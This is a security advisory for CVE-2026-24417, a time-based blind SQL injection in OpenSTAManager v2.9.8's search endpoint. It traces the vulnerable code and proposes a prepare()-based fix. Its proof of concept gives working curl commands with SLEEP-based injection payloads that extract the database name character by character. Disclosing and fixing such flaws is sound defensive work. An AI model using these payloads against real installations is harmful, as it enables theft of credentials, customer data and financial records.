CVE-2026-24417
Summary
Critical Time-Based Blind SQL Injection vulnerability affecting multiple search modules in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents including password hashes, customer data, and financial records through time-based Boolean inference attacks with amplified execution across 10+ modules.
Status: ✅ Confirmed and tested on live instance (v2.9.8)
Vulnerable Parameter: term (GET)
Affected Endpoint: /ajax_search.php
Affected Modules: Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, Interventi
Details
OpenSTAManager v2.9.8 contains a critical Time-Based Blind SQL Injection vulnerability in the global search functionality. The application fails to properly sanitize the term parameter before using it in SQL LIKE clauses across multiple module-specific search handlers, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.
Vulnerability Chain:
- Entry Point:
/ajax_search.php(Line 30-31)
```php
$term = get('term');
$term = str_replace('/', '\/', $term);
```
The $term parameter undergoes minimal sanitization (only forward slash replacement).
- Distribution:
/src/AJAX.php::search()(Line 159-161)
```php
$files = self::find('ajax/search.php');
arrayunshift($files, basedir().'/ajax_search.php');
foreach ($files as $file) {
$module_results = self::getSearchResults($file, $term);
```
The unsanitized $term is passed to all module-specific search handlers.
- Execution:
/src/AJAX.php::getSearchResults()(Line 373)
```php
require $file;
```
Each module's search.php file is included with $term variable in scope.
- Vulnerable SQL Queries: Multiple modules directly concatenate
$termwithoutprepare()
All Affected Files (10+ vulnerable instances):
/modules/articoli/ajax/search.php- Line 51 (PRIMARY EXAMPLE)
```php
foreach ($fields as $name => $value) {
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
}
$rs = $dbo->fetchArray($query);
```
Impact: Direct concatenation without prepare(), allows full SQL injection.
/modules/ordini/ajax/search.php- Line 43, 47
```php
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
$query .= '... WHERE mg_articoli.codice LIKE "%'.$term.'%" OR mgarticolilang.title LIKE "%'.$term.'%"';
```
/modules/ddt/ajax/search.php- Line 43, 47
```php
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
```
/modules/fatture/ajax/search.php- Line 45, 49
```php
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
```
/modules/preventivi/ajax/search.php- Line 45, 49
```php
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
```
/modules/anagrafiche/ajax/search.php- Line 62, 107, 162
```php
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
```
/modules/impianti/ajax/search.php- Line 46
```php
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
```
Properly Sanitized (NOT vulnerable):
/modules/contratti/ajax/search.php- Usesprepare()correctly/modules/automezzi/ajax/search.php- Usesprepare()correctly
Note: The vulnerability has amplified execution - a single malicious request triggers SQL Injection across ALL vulnerable modules simultaneously, causing time-based attacks to execute 10+ times per request, multiplying the delay and leading to 504 Gateway Time-out errors as observed on the live demo instance.
<img width="1899" height="349" alt="image" src="https://github.com/user-attachments/assets/a6cc5a75-0f4e-4f49-a750-7ae72a363bbe" />
PoC
Step 1: Login
curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'Step 2: Verify Vulnerability (Time-Based SLEEP)
## Test with SLEEP(1) - should take ~85+ seconds due to amplified execution
time curl -s -b /tmp/cookies.txt \
'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(1)%20OR%20%22'
## Result: real 72.29s
## Test with SLEEP(0) - should be fast
time curl -s -b /tmp/cookies.txt \
'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(0)%20OR%20%22'
## Result: real 0.30s<img width="727" height="319" alt="image" src="https://github.com/user-attachments/assets/6022de5e-de91-4ebb-b02a-30358c31d96d" />
Step 3: Data Extraction - Database Name
## Extract first character of database name (expected: 'o' from 'openstamanager')
time curl -s -b /tmp/cookies.txt \
"http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
> /dev/null
## Result: real 170.32s
## Test with wrong character 'x' - should be fast
time curl -s -b /tmp/cookies.txt \
"http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27x%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
> /dev/null
## Result: real 0m0.30s<img width="1364" height="349" alt="image" src="https://github.com/user-attachments/assets/a1d8a7d8-bb1a-49cd-8400-136ae5e359f1" />
Impact
Affected Users: All authenticated users with access to the global search functionality.
- Complete database exfiltration including customer PII, financial records, business secrets
- Extraction of password hashes for offline cracking
- Amplified time-based attacks consume 85x server resources per request
Recommended Fix:
Replace all instances of direct $term concatenation with prepare():
BEFORE (Vulnerable):
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';AFTER (Fixed):
$query .= ' OR '.$value.' LIKE '.prepare('%'.$term.'%');Apply this fix to ALL affected files:
/modules/articoli/ajax/search.php- Line 51/modules/ordini/ajax/search.php- Lines 43, 47, 79/modules/ddt/ajax/search.php- Lines 43, 47, 83/modules/fatture/ajax/search.php- Lines 45, 49, 85/modules/preventivi/ajax/search.php- Lines 45, 49, 83/modules/anagrafiche/ajax/search.php- Lines 62, 107, 162/modules/impianti/ajax/search.php- Line 46
Package Versions Affected
Automatically patch vulnerabilities without upgrading
CVSS Version
Related Resources
References
https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4hc4-8599-xh2h, https://nvd.nist.gov/vuln/detail/CVE-2026-24417, https://github.com/devcode-it/openstamanager
Basic Information
